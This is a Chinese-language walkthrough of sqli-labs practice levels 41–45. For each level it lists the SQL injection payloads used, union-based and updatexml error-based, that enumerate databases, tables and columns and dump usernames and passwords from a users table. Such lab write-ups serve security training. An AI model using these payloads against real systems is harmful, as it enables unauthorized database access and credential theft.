第四一关 less-41
data:image/s3,"s3://crabby-images/f0377/f0377b1a21a4fb1917ff1fbe1dbbc25422bf0fc4" alt=""
步骤一:查询闭合方式
?id=1 --+
data:image/s3,"s3://crabby-images/c7620/c762014f344a98997081f6941f9b19b248acac96" alt=""
步骤二:查询数据库
?id=-1 union select 1,2,database()--+
data:image/s3,"s3://crabby-images/50d0b/50d0b4d82e7ab207cc7c00608175b74b3d6b92f1" alt=""
步骤三:查看表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
data:image/s3,"s3://crabby-images/4412b/4412b4a5c01faa5f7b68e82d12dca3d88721b168" alt=""
步骤四:查看users表列名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
data:image/s3,"s3://crabby-images/8dfe8/8dfe85c55875e5a9837c814dcbb9c9521222b986" alt=""
步骤五:查看users表信息
?id=-1 union select 1,2,group_concat(id,username,password) from users --+
data:image/s3,"s3://crabby-images/c806a/c806a026b6b68b3f2307b8b6eeaf2f0a88ac15a3" alt=""
第四二关 less-42
data:image/s3,"s3://crabby-images/6e88a/6e88a3c95c971e83271c02b621642f9bf965158a" alt=""
步骤一:登录页面
data:image/s3,"s3://crabby-images/4cc88/4cc88621333368ae9774ac5bdf6b6cb43fec74c1" alt=""
步骤二:查询数据库
密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa
data:image/s3,"s3://crabby-images/42598/425982db1d2606b0f42b899f3ddc75bca235d3d3" alt=""
步骤三:查看表名
密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa
data:image/s3,"s3://crabby-images/825e8/825e8517d4a8bd6d060cb11119c0d4c8bc78113f" alt=""
步骤四:查看users表列名
密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_sche ma.columns where table_name='users' ),0x7e),1) -- aaa
data:image/s3,"s3://crabby-images/2675f/2675f461482f2873454ea44e8539b754d931923e" alt=""
第四三关 less-43
步骤一:登录页面
data:image/s3,"s3://crabby-images/f80d0/f80d0f20a3316fb33114ef18c0352b2a3180919d" alt=""
步骤二:查询数据库
密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa
data:image/s3,"s3://crabby-images/68341/68341fa3bb29beab56a7ea8d44177d77808bab1b" alt=""
步骤三:查看表名
密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa
data:image/s3,"s3://crabby-images/b074f/b074f2f34a0f656ccbb9f4523f7af78e936652e1" alt=""
步骤四:查看users表列名
密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa
data:image/s3,"s3://crabby-images/a2994/a2994f6bd2e3ddce7f7ff524a2c0e8e40e39a86e" alt=""
第四四关 less-44
步骤一:登录页面
data:image/s3,"s3://crabby-images/350aa/350aa9b191de85734cf03d157d4949012d25f01c" alt=""
步骤二:查询数据库
密码框输入:1' union select 1,database(),3 #
data:image/s3,"s3://crabby-images/6b40a/6b40a0c1e54250b0c8c00e967f14850a9e1b6901" alt=""
步骤三:查看表名
密码框输入:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
data:image/s3,"s3://crabby-images/cf2e0/cf2e078ce98ecbd9a18ea6b59b90f14c5e03d044" alt=""
步骤四:查看users表列名
密码框输入:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
data:image/s3,"s3://crabby-images/d7b17/d7b171ae618cb37dc1614de8449e60cddf322beb" alt=""
步骤五:查看表中信息
1' union select 1,group_concat(username,password),3 from users #
data:image/s3,"s3://crabby-images/489bb/489bbdab6f4e8dbeaec70e7c50c5f2c56d1c4152" alt=""
第四五关 less-45
步骤一:登录页面
data:image/s3,"s3://crabby-images/1aada/1aada26f7e5227ba7d20ad977ec7bbe14c5431a2" alt=""
步骤二:查询数据库
密码框输入:1') union select 1,database(),3 #
data:image/s3,"s3://crabby-images/80a1e/80a1e77b95e4cb24e584f264d6f266f5e42eacfb" alt=""
步骤三:查看表名
密码框输入:1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
步骤四:查看users表列名
密码框输入:1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
data:image/s3,"s3://crabby-images/f9539/f9539349165117c60d6efdaf8b3e236abfdd3764" alt=""